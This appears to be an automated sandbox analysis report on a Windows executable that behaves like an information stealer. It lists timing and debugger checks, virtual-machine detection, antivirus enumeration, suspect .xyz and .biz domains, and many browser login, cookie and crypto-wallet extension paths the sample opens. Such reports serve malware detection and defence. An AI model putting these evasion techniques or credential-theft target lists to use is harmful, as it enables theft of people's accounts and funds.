                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 50509D2 second address: 5050A2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 pushfd 0x00000007 jmp 00007F5D20C24763h 0x0000000c sub ecx, 0698977Eh 0x00000012 jmp 00007F5D20C24769h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 call 00007F5D20C24763h 0x00000025 pop ecx 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5050A2B second address: 5050B38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, ah 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F5D20D3D696h 0x0000000e mov dword ptr [esp], esi 0x00000011 jmp 00007F5D20D3D690h 0x00000016 mov esi, dword ptr [ebp+0Ch] 0x00000019 jmp 00007F5D20D3D690h 0x0000001e test esi, esi 0x00000020 jmp 00007F5D20D3D690h 0x00000025 je 00007F5D9290AFBBh 0x0000002b jmp 00007F5D20D3D690h 0x00000030 cmp dword ptr [76C8459Ch], 05h 0x00000037 pushad 0x00000038 mov esi, 2149D69Dh 0x0000003d pushfd 0x0000003e jmp 00007F5D20D3D68Ah 0x00000043 jmp 00007F5D20D3D695h 0x00000048 popfd 0x00000049 popad 0x0000004a je 00007F5D92923056h 0x00000050 pushad 0x00000051 pushfd 0x00000052 jmp 00007F5D20D3D68Ch 0x00000057 or si, 1658h 0x0000005c jmp 00007F5D20D3D68Bh 0x00000061 popfd 0x00000062 call 00007F5D20D3D698h 0x00000067 mov ecx, 2266AE91h 0x0000006c pop esi 0x0000006d popad 0x0000006e push esp 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 jmp 00007F5D20D3D68Fh 0x00000077 call 00007F5D20D3D698h 0x0000007c pop ecx 0x0000007d popad 0x0000007e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5050B38 second address: 5050B53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D20C24767h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5050B53 second address: 5050B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5050C43 second address: 5050C49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5050C49 second address: 5050C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5D20D3D691h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: 5050C67 second address: 5050C7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSpecial instruction interceptor: First address: 8F7AEE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSpecial instruction interceptor: First address: A9F492 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSpecial instruction interceptor: First address: A9DDD0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSpecial instruction interceptor: First address: AB0D15 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSpecial instruction interceptor: First address: B2DF72 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe TID: 7752Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe TID: 7796Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485900304.0000000005A84000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
                Source: wf1Ps82LYF.exe, 00000000.00000002.1617099230.0000000000A80000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: wf1Ps82LYF.exe, wf1Ps82LYF.exe, 00000000.00000003.1615918286.0000000001038000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1615918286.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1616158782.000000000106A000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1565544561.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1540480401.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1578765912.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000002.1617896976.0000000001038000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1540788781.0000000001068000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000002.1618045816.000000000106C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: wf1Ps82LYF.exe, 00000000.00000002.1617099230.0000000000A80000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: wf1Ps82LYF.exe, 00000000.00000003.1485601278.0000000005A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: SICE
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: wf1Ps82LYF.exe, 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: debonairnukk.xyz
                Source: wf1Ps82LYF.exe, 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: diffuculttan.xyz
                Source: wf1Ps82LYF.exe, 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: effecterectz.xyz
                Source: wf1Ps82LYF.exe, 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: deafeninggeh.biz
                Source: wf1Ps82LYF.exe, 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: immureprech.biz
                Source: wf1Ps82LYF.exe, 00000000.00000002.1616980214.00000000008A1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: tacitglibbr.biz
                Source: wf1Ps82LYF.exe, 00000000.00000002.1617099230.0000000000A80000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: on?!aProgram Manager
                Source: wf1Ps82LYF.exe, 00000000.00000002.1617099230.0000000000A80000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: n?!aProgram Manager
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: wf1Ps82LYF.exe, 00000000.00000003.1565482886.00000000010CD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: wf1Ps82LYF.exe, 00000000.00000003.1565482886.00000000010CD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fender\MsMpeng.exe
                Source: wf1Ps82LYF.exe, 00000000.00000003.1565482886.00000000010CD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ws Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match | File source: Process Memory Space: wf1Ps82LYF.exe PID: 7588, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: wf1Ps82LYF.exe | String found in binary or memory: Wallets/Electrum
                Source: wf1Ps82LYF.exe | String found in binary or memory: Wallets/ElectronCash
                Source: wf1Ps82LYF.exe | String found in binary or memory: window-state.json
                Source: wf1Ps82LYF.exe, 00000000.00000003.1616132956.00000000010C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfo
                Source: wf1Ps82LYF.exe, 00000000.00000003.1540480401.0000000001068000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: wf1Ps82LYF.exe | String found in binary or memory: Wallets/Exodus
                Source: wf1Ps82LYF.exe | String found in binary or memory: Wallets/Ethereum
                Source: wf1Ps82LYF.exe | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: wf1Ps82LYF.exe | String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
